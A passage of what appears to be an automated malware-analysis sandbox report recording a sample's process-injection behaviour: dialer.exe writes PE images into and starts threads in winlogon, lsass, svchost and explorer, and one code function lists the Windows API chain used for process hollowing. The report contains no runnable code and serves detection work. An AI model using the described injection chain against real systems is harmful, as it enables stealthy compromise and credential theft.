Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25EF7B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 209A6850000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 238E5420000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 283B9F80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1FC2C760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29CA4D30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1F086AE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1F086D10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\reg.exe base: 1E5DD230000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20893350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 15AD96F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\reg.exe base: 1E3D8050000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 17_2_00007FF65A131C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

17_2_00007FF65A131C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC67273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0B1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6133273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEFF273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A415273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6694273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 881273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC65273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7874273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5515273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F7B1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A685273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E542273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B9F8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C76273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9523273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BEF4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 412F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A4D3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6ADF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 86AE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 86D1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DD23273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 20C4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6B76273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6BA1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D96F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D805273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 620F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 623A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 142A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 142D273C

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEFF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8810000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25EF7B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 209A6850000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 238E5420000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 283B9F80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FC2C760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29CA4D30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F086AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F086D10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\reg.exe base: 1E5DD230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20893350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 15AD96F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\reg.exe base: 1E3D8050000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 8810000 value: 4D

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe	Thread register set: target process: 6832	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 8096
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 2784
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 1508

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe	Memory written: C:\Windows\System32\dialer.exe base: A024D3C010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6C6FCE3010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: D9DDDD2010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 2FA04EF010
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
